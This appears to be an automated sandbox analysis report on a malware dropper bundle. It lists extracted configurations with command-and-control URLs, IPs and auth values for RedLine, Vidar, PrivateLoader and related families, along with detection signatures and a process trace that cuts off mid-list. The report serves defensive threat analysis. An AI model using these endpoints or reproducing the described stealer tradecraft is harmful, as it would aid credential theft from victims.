Overview
overview
10Static
static
1001a53007f9...68.exe
windows7-x64
1001a53007f9...68.exe
windows10-2004-x64
10022e3c30a1...66.exe
windows7-x64
6022e3c30a1...66.exe
windows10-2004-x64
602ca2b5bb7...35.exe
windows7-x64
1002ca2b5bb7...35.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
100d69cafe70...cd.exe
windows7-x64
100d69cafe70...cd.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
100df647f0a2...bc.exe
windows7-x64
100df647f0a2...bc.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
101df367eead...2c.exe
windows7-x64
101df367eead...2c.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
101e083736ae...33.exe
windows7-x64
101e083736ae...33.exe
windows10-2004-x64
101e662d9025...7d.exe
windows7-x64
101e662d9025...7d.exe
windows10-2004-x64
102010009ff5...59.exe
windows7-x64
102010009ff5...59.exe
windows10-2004-x64
10243379992d...93.exe
windows7-x64
10243379992d...93.exe
windows10-2004-x64
102d63a14e4a...1a.exe
windows7-x64
102d63a14e4a...1a.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
167s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04-11-2024 23:53
Behavioral task
behavioral1
Sample
01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
02ca2b5bb774890c50950ad93becc2851bac8d04c35464dad4854088c5db4135.exe
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
02ca2b5bb774890c50950ad93becc2851bac8d04c35464dad4854088c5db4135.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
setup_installer.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
setup_installer.exe
Resource
win7-20240729-en
Behavioral task
behavioral12
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
setup_installer.exe
Resource
win7-20241010-en
Behavioral task
behavioral16
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
1df367eead22695952cce5131891dfec5c479da37cb3dac0403015ebb785032c.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
1df367eead22695952cce5131891dfec5c479da37cb3dac0403015ebb785032c.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
setup_installer.exe
Resource
win7-20240708-en
Behavioral task
behavioral20
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
2010009ff5b8b55fbcaa90318461a1b5b69ef6c8fd32ac279e81a10844d57859.exe
Resource
win7-20240729-en
Behavioral task
behavioral26
Sample
2010009ff5b8b55fbcaa90318461a1b5b69ef6c8fd32ac279e81a10844d57859.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
Resource
win7-20241010-en
Behavioral task
behavioral28
Sample
243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe
Resource
win10v2004-20241007-en
General
-
Target
1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe
-
Size
5.9MB
-
MD5
2054a395da9f7a789bef703c5d2d60c1
-
SHA1
f170cbc93d4fb3f4f92ccd88039272bf78bdfa89
-
SHA256
1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433
-
SHA512
1439382b36a24d898fc769a742b05c2c9ad898a6e5750e0f7e813fd5d536834e44572061efb0c89af72c5a97c3502e9ee30c2c861154f0fbb4c4164e3880ffcf
-
SSDEEP
98304:xHCvLUBsghjeXIZ90vNP7S5OFFh506+n5+4fKwKy7mGVYQUki4mG:xkLUCghZ90e5+50T7fKwV7mGaQBmG
Malware Config
Extracted
nullmixer
http://hsiens.xyz/
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.znsjis.top/
Extracted
privateloader
http://45.133.1.107/server.txt
pastebin.com/raw/A7dSG1te
http://wfsdragon.ru/api/setStats.php
51.178.186.149
Extracted
redline
media17
91.121.67.60:2151
-
auth_value
e37d5065561884bb54c8ed1baa6de446
Extracted
redline
ANI
194.104.136.5:46013
-
auth_value
9491a1c5e11eb6097e68a4fa8627fda8
Extracted
vidar
41.4
916
https://mas.to/@sslam
-
profile_id
916
Extracted
gcleaner
ppp-gl.biz
45.9.20.13
Signatures
-
Detect Fabookie payload 1 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00946c5090.exe family_fabookie -
Fabookie family
-
Gcleaner family
-
Nullmixer family
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Onlylogger family
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Privateloader family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 10 IoCs
Processes:
resource yara_rule behavioral21/memory/2324-230-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral21/memory/2324-228-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral21/memory/2324-227-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral21/memory/2324-224-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral21/memory/2324-222-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral21/memory/1880-258-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral21/memory/1880-260-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral21/memory/1880-257-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral21/memory/1880-254-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral21/memory/1880-252-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 10 IoCs
Processes:
resource yara_rule behavioral21/memory/2324-230-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral21/memory/2324-228-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral21/memory/2324-227-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral21/memory/2324-224-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral21/memory/2324-222-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral21/memory/1880-258-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral21/memory/1880-260-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral21/memory/1880-257-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral21/memory/1880-254-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral21/memory/1880-252-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat -
Sectoprat family
-
Socelars family
-
Socelars payload 1 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\7zS47A72937\Mon00f8ffa77fe72688.exe family_socelars -
Vidar family
-
OnlyLogger payload 1 IoCs
Processes:
resource yara_rule behavioral21/memory/2140-264-0x0000000000400000-0x00000000007A0000-memory.dmp family_onlylogger -
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral21/memory/2904-261-0x0000000000400000-0x00000000007F3000-memory.dmp family_vidar -
Blocklisted process makes network request 2 IoCs
Processes:
rundll32.exeflow pid process 80 2424 rundll32.exe 85 2424 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\7zS47A72937\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS47A72937\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS47A72937\libcurlpp.dll aspack_v212_v242 -
Executes dropped EXE 25 IoCs
Processes:
setup_install.exeMon00ea631982.exeMon001dcfc58b0850.exeMon00806cfb48.exeMon00e469051c4c7a.exeMon00ef1e53f6f539435.exeMon00d0d86f7f1e6.exeMon001dcfc58b0850.tmpMon00ffeff6b2.exeMon00df41776583.exeMon00946c5090.exeMon00f8ffa77fe72688.exeMon00536518ad16.exeMon0052c87b01411369.exeMon00b1dca232.exeMon0086072e872c.exeMon003b11682c.exeMon001dcfc58b0850.exeMon001dcfc58b0850.tmp09xU.exEESYZ4xAO6IJ.eXEMon00df41776583.exeMon003b11682c.exeMon003b11682c.exef795de9.exepid process 2740 setup_install.exe 2332 Mon00ea631982.exe 2516 Mon001dcfc58b0850.exe 1036 Mon00806cfb48.exe 2932 Mon00e469051c4c7a.exe 2904 Mon00ef1e53f6f539435.exe 1972 Mon00d0d86f7f1e6.exe 1432 Mon001dcfc58b0850.tmp 2832 Mon00ffeff6b2.exe 3052 Mon00df41776583.exe 2860 Mon00946c5090.exe 2320 Mon00f8ffa77fe72688.exe 2132 Mon00536518ad16.exe 1976 Mon0052c87b01411369.exe 2140 Mon00b1dca232.exe 2448 Mon0086072e872c.exe 1996 Mon003b11682c.exe 1884 Mon001dcfc58b0850.exe 1952 Mon001dcfc58b0850.tmp 2216 09xU.exE 1708 ESYZ4xAO6IJ.eXE 2324 Mon00df41776583.exe 2000 Mon003b11682c.exe 1880 Mon003b11682c.exe 1584 f795de9.exe -
Loads dropped DLL 64 IoCs
Processes:
1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeMon00ea631982.exeMon001dcfc58b0850.execmd.execmd.execmd.exeMon00e469051c4c7a.execmd.exeMon00ef1e53f6f539435.exeMon00806cfb48.execmd.exeMon00ffeff6b2.execmd.exeMon00df41776583.exeMon00f8ffa77fe72688.exeMon00536518ad16.exeMon001dcfc58b0850.tmpcmd.execmd.exeMon0052c87b01411369.exeMon003b11682c.exeMon00b1dca232.exeMon0086072e872c.exeWerFault.exepid process 2676 1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe 2676 1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe 2676 1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe 2740 setup_install.exe 2740 setup_install.exe 2740 setup_install.exe 2740 setup_install.exe 2740 setup_install.exe 2740 setup_install.exe 2740 setup_install.exe 2740 setup_install.exe 468 cmd.exe 2508 cmd.exe 2508 cmd.exe 1676 cmd.exe 3040 cmd.exe 3040 cmd.exe 2816 cmd.exe 2916 cmd.exe 2928 cmd.exe 2332 Mon00ea631982.exe 2332 Mon00ea631982.exe 2516 Mon001dcfc58b0850.exe 2516 Mon001dcfc58b0850.exe 3024 cmd.exe 544 cmd.exe 544 cmd.exe 2988 cmd.exe 2932 Mon00e469051c4c7a.exe 2932 Mon00e469051c4c7a.exe 2828 cmd.exe 2904 Mon00ef1e53f6f539435.exe 2904 Mon00ef1e53f6f539435.exe 1036 Mon00806cfb48.exe 1036 Mon00806cfb48.exe 2452 cmd.exe 2516 Mon001dcfc58b0850.exe 2832 Mon00ffeff6b2.exe 2832 Mon00ffeff6b2.exe 2856 cmd.exe 2856 cmd.exe 3052 Mon00df41776583.exe 3052 Mon00df41776583.exe 2320 Mon00f8ffa77fe72688.exe 2320 Mon00f8ffa77fe72688.exe 2132 Mon00536518ad16.exe 2132 Mon00536518ad16.exe 1432 Mon001dcfc58b0850.tmp 1432 Mon001dcfc58b0850.tmp 1432 Mon001dcfc58b0850.tmp 328 cmd.exe 2112 cmd.exe 2112 cmd.exe 1432 Mon001dcfc58b0850.tmp 1976 Mon0052c87b01411369.exe 1976 Mon0052c87b01411369.exe 1996 Mon003b11682c.exe 1996 Mon003b11682c.exe 2140 Mon00b1dca232.exe 2140 Mon00b1dca232.exe 2448 Mon0086072e872c.exe 2448 Mon0086072e872c.exe 888 WerFault.exe 888 WerFault.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
Processes:
flow ioc 43 pastebin.com 49 iplogger.org 50 iplogger.org 28 iplogger.org 30 iplogger.org 40 pastebin.com 41 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 23 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
Mon00df41776583.exeMon003b11682c.exedescription pid process target process PID 3052 set thread context of 2324 3052 Mon00df41776583.exe Mon00df41776583.exe PID 1996 set thread context of 1880 1996 Mon003b11682c.exe Mon003b11682c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process 888 1036 WerFault.exe 2932 2740 WerFault.exe setup_install.exe 2684 2904 WerFault.exe Mon00ef1e53f6f539435.exe 932 1584 WerFault.exe f795de9.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
setup_install.execmd.exetaskkill.execmd.exerundll32.execmd.execmd.execmd.execmd.exeMon0086072e872c.execmd.execmd.exeMon00df41776583.exeMon00536518ad16.exemshta.execmd.execmd.exeMon00806cfb48.exemshta.execmd.exeMon00f8ffa77fe72688.exeMon0052c87b01411369.exeMon003b11682c.exeMon00e469051c4c7a.exemshta.execmd.execmd.exeMon00ea631982.exe1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exeMon001dcfc58b0850.tmpMon00b1dca232.exepowershell.execmd.exemsiexec.exetaskkill.exeMon00df41776583.execmd.execmd.exeMon00ffeff6b2.execmd.exemshta.exe09xU.exEcmd.exeMon00ef1e53f6f539435.execmd.execontrol.execmd.exeMon001dcfc58b0850.execmd.execmd.exef795de9.execmd.execmd.exeMon001dcfc58b0850.exeMon001dcfc58b0850.tmptaskkill.execmd.execmd.exeESYZ4xAO6IJ.eXEcmd.exeMon003b11682c.exemshta.exemshta.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon0086072e872c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon00df41776583.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon00536518ad16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon00806cfb48.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon00f8ffa77fe72688.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon0052c87b01411369.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon003b11682c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon00e469051c4c7a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon00ea631982.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon001dcfc58b0850.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon00b1dca232.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon00df41776583.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon00ffeff6b2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 09xU.exE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon00ef1e53f6f539435.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language control.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon001dcfc58b0850.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f795de9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon001dcfc58b0850.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon001dcfc58b0850.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ESYZ4xAO6IJ.eXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon003b11682c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 2276 taskkill.exe 2780 taskkill.exe 2712 taskkill.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2220 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
Mon001dcfc58b0850.tmpMon00b1dca232.exepid process 1952 Mon001dcfc58b0850.tmp 2140 Mon00b1dca232.exe -
Suspicious use of AdjustPrivilegeToken 40 IoCs
Processes:
Mon00f8ffa77fe72688.exetaskkill.exetaskkill.exeMon00ffeff6b2.exeMon00d0d86f7f1e6.exepowershell.exetaskkill.exedescription pid process Token: SeCreateTokenPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeAssignPrimaryTokenPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeLockMemoryPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeIncreaseQuotaPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeMachineAccountPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeTcbPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeSecurityPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeTakeOwnershipPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeLoadDriverPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeSystemProfilePrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeSystemtimePrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeProfSingleProcessPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeIncBasePriorityPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeCreatePagefilePrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeCreatePermanentPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeBackupPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeRestorePrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeShutdownPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeDebugPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeAuditPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeSystemEnvironmentPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeChangeNotifyPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeRemoteShutdownPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeUndockPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeSyncAgentPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeEnableDelegationPrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeManageVolumePrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeImpersonatePrivilege 2320 Mon00f8ffa77fe72688.exe Token: SeCreateGlobalPrivilege 2320 Mon00f8ffa77fe72688.exe Token: 31 2320 Mon00f8ffa77fe72688.exe Token: 32 2320 Mon00f8ffa77fe72688.exe Token: 33 2320 Mon00f8ffa77fe72688.exe Token: 34 2320 Mon00f8ffa77fe72688.exe Token: 35 2320 Mon00f8ffa77fe72688.exe Token: SeDebugPrivilege 2276 taskkill.exe Token: SeDebugPrivilege 2780 taskkill.exe Token: SeDebugPrivilege 2832 Mon00ffeff6b2.exe Token: SeDebugPrivilege 1972 Mon00d0d86f7f1e6.exe Token: SeDebugPrivilege 2220 powershell.exe Token: SeDebugPrivilege 2712 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exesetup_install.execmd.exedescription pid process target process PID 2676 wrote to memory of 2740 2676 1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe setup_install.exe PID 2676 wrote to memory of 2740 2676 1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe setup_install.exe PID 2676 wrote to memory of 2740 2676 1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe setup_install.exe PID 2676 wrote to memory of 2740 2676 1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe setup_install.exe PID 2676 wrote to memory of 2740 2676 1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe setup_install.exe PID 2676 wrote to memory of 2740 2676 1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe setup_install.exe PID 2676 wrote to memory of 2740 2676 1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe setup_install.exe PID 2740 wrote to memory of 2424 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2424 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2424 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2424 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2424 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2424 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2424 2740 setup_install.exe cmd.exe PID 2424 wrote to memory of 2220 2424 cmd.exe powershell.exe PID 2424 wrote to memory of 2220 2424 cmd.exe powershell.exe PID 2424 wrote to memory of 2220 2424 cmd.exe powershell.exe PID 2424 wrote to memory of 2220 2424 cmd.exe powershell.exe PID 2424 wrote to memory of 2220 2424 cmd.exe powershell.exe PID 2424 wrote to memory of 2220 2424 cmd.exe powershell.exe PID 2424 wrote to memory of 2220 2424 cmd.exe powershell.exe PID 2740 wrote to memory of 2112 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2112 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2112 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2112 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2112 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2112 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2112 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2508 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2508 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2508 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2508 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2508 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2508 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 2508 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 468 2740 setup_install.exe cmd.exe PID 2740 wrote to memory of 468 2740 setup_install.exe 